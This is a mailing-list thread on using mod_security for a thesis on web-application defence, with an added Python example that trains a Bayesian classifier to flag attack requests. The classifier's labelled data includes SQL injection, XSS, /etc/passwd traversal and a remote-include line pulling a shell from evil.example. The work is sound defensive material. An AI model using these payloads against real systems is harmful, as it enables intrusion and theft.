Mark,
To your last comment - one of my todo research items is to use bogofilter in 
Lua to do Bayesian analysis.  There are some interesting capabilities. We would 
need to be able to train the classifier on "good" transactions and then maybe run 
different attack tools and classify them as "bad". The trick would then be to 
find the ideal Ham/Spam threshold for live analysis.

--
Ryan Barnett


On Jan 25, 2011, at 4:51 PM, "Mark Lavi" <[email protected]> wrote:

>I'd rather not focus on this particular tool, but create some system that 
>would secure for example some specific kinds of websites.

Agreed, you should be applying your thoughts to the arena of "web application 
security," where mod_security is your method of implementing/testing/analyzing 
your particular focus.

>Are there any tools that help organising, applying mod security rules? Is it 
>needed? What could make it more research-like? Any hints please?

The iterations of the CRS are a pain since they can change a bit with each 
release, but that is the nature of their maturity. They are hard to understand 
since they aren't documented in detail.

You know, the webgoat project (a kind of web app honey pot at 
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project and I seem to 
recall another one used by Google) being protected by mod_security would be an 
ideal way to document (and do unit testing on) the CRS. I don't know if that is 
how the CRS is tested and benchmarked?

I would have to say that the LUA scripting engine would also be an ideal 
place to insert your value or hypothesis with or without using the CRS since 
mod_security is an incredible auditing tool:

- test out new, hypothesized attacks and create an algorithmic or heuristic 
response to log/drop the attacks in LUA/custom rules/etc.
- attach mod_security to a Bayesian filter 
(http://en.wikipedia.org/wiki/Bayesian_filter) and apply email like tactics to 
web traffic/attacks

Mark Lavi
Senior Web Producer

sgi

46600 Landing Parkway
Fremont, CA 94538
(510) 933-5234 direct
[email protected]
www.sgi.com
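The Bayesian ham/spam idea Ryan and Mark sketch above, worked through as an added example that is not code from either of them, from bogofilter, or from mod_security: a plain Naive Bayes over the tokens of an HTTP request line, trained on a constructed set of "good" transactions and a constructed set of scanner-style "bad" ones, with the ham/spam cut-off then picked from a small held-out labelled set. Every request line, the RequestClassifier class, choose_threshold and HOLDOUT are this example's own assumptions; running such a scorer from mod_security's Lua engine, as the thread proposes, is not shown here.

```python
import math
import re
from collections import Counter

# Constructed "good" (ham) training requests: ordinary traffic to a small shop.
GOOD_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /products?id=42 HTTP/1.1",
    "GET /products?id=17&sort=price HTTP/1.1",
    "POST /login HTTP/1.1 user=alice&pass=secret",
    "GET /search?q=red+shoes HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
    "GET /products?id=8&page=2 HTTP/1.1",
    "GET /account?tab=orders HTTP/1.1",
]
# Constructed "bad" (spam) training requests: textbook payloads of the kind an
# attack scanner emits, used here only as labelled examples.
BAD_REQUESTS = [
    "GET /products?id=42'+OR+'1'='1 HTTP/1.1",
    "GET /search?q=<script>alert(1)</script> HTTP/1.1",
    "GET /products?id=1+UNION+SELECT+username,password+FROM+users HTTP/1.1",
    "GET /../../../../etc/passwd HTTP/1.1",
    "POST /login HTTP/1.1 user=admin'--&pass=x",
    "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1",
]
# Words plus each punctuation character on its own: quotes, angle brackets and
# comment markers are precisely the tokens that separate attacks from ham.
TOKEN_RE = re.compile(r"[A-Za-z0-9_]+|[^A-Za-z0-9_\s]")


def tokenize(request):
    """Distinct lower-cased tokens of one request (presence, not frequency)."""
    return set(TOKEN_RE.findall(request.lower()))


class RequestClassifier:
    """Naive Bayes over token presence with Laplace (add-one) smoothing."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha
        self.doc_count = {"good": 0, "bad": 0}
        self.token_count = {"good": Counter(), "bad": Counter()}
        self.vocab = set()

    def train(self, request, label):
        self.doc_count[label] += 1
        for tok in tokenize(request):
            self.token_count[label][tok] += 1
            self.vocab.add(tok)

    def _log_prob(self, tokens, label):
        # log P(token present | label); smoothing keeps unseen tokens off log(0)
        total = self.doc_count[label] + 2 * self.alpha
        return sum(math.log((self.token_count[label][t] + self.alpha) / total)
                   for t in tokens)

    def p_bad(self, request):
        """Posterior probability that the request is an attack, in [0, 1]."""
        # Tokens never seen in training are no evidence either way: skip them.
        tokens = [t for t in tokenize(request) if t in self.vocab]
        n = self.doc_count["good"] + self.doc_count["bad"]
        log_good = math.log(self.doc_count["good"] / n) + self._log_prob(tokens, "good")
        log_bad = math.log(self.doc_count["bad"] / n) + self._log_prob(tokens, "bad")
        diff = max(-500.0, min(500.0, log_good - log_bad))  # clamp before exp
        return 1.0 / (1.0 + math.exp(diff))                  # logistic posterior

    def classify(self, request, threshold):
        return "bad" if self.p_bad(request) >= threshold else "good"


def choose_threshold(clf, labelled):
    """Pick the ham/spam cut-off on a held-out labelled set: try the midpoints
    between neighbouring scores, keep the most accurate one, and break ties
    towards the higher cut-off so legitimate traffic is blocked least often."""
    scored = sorted((clf.p_bad(req), label) for req, label in labelled)
    scores = [s for s, _ in scored]
    candidates = [(a + b) / 2 for a, b in zip(scores, scores[1:])] or [0.5]

    def accuracy(t):
        return sum(("bad" if s >= t else "good") == lab for s, lab in scored) / len(scored)

    return max(candidates, key=lambda t: (accuracy(t), t))


# Constructed held-out set used only to pick the threshold.
HOLDOUT = [
    ("GET /products?id=99&sort=name HTTP/1.1", "good"),
    ("GET /account?tab=profile HTTP/1.1", "good"),
    ("GET /products?id=5'+OR+1=1-- HTTP/1.1", "bad"),
    ("GET /search?q=<script>alert(document.cookie)</script> HTTP/1.1", "bad"),
]


def build_classifier():
    clf = RequestClassifier()
    for req in GOOD_REQUESTS:
        clf.train(req, "good")
    for req in BAD_REQUESTS:
        clf.train(req, "bad")
    return clf


def run_demo():
    """Train, choose the cut-off on HOLDOUT, return (threshold, verdict per request)."""
    clf = build_classifier()
    threshold = choose_threshold(clf, HOLDOUT)
    return threshold, {req: clf.classify(req, threshold) for req, _ in HOLDOUT}


if __name__ == "__main__":
    clf = build_classifier()
    threshold, verdicts = run_demo()
    print(f"threshold = {threshold:.2f}")
    for req, _ in HOLDOUT:
        print(f"{clf.p_bad(req):.3f} {verdicts[req]:4s} {req}")
```

With fourteen training lines the scores are driven almost entirely by the punctuation tokens (`'`, `<`, `>`, `--`) that ham never contains, which is exactly the effect Ryan describes: a benign parametrised request scores well under 0.5 and the injection-style ones above 0.9, so any cut-off in between works on the held-out set. The same property is the main caveat for live use: the threshold and the token-presence model only generalise as far as the "good" corpus covers the site's real traffic, so the ham set must be drawn from that site rather than a generic one, and anything the classifier flags should go through mod_security's audit log for review before it is allowed to drop requests.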



________________________________
From: Pawel Duda [mailto:[email protected]]
Sent: Friday, January 21, 2011 12:46 PM
To: [email protected]
Subject: [mod-security-users] mod_security - how to use for master thesis?

Hi, I've been playing with mod_security for some time and I'd like somehow to 
use it in my master thesis. I don't know exactly how this work could be more 
interesting than describing what mod_security does, what kind of web attacks 
can be prevented using it, what are other functions of it (like analysing if 
the requests are really HTTP, analysing XML). I'd rather not focus on this 
particular tool, but create some system that would secure for example some 
specific kinds of websites. Are there any tools that help organising, applying 
mod security rules? Is it needed? What could make it more research-like? Any 
hints please?
_______________________________________________
Owasp-modsecurity-core-rule-set mailing list
[email protected]<mailto:[email protected]>
https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set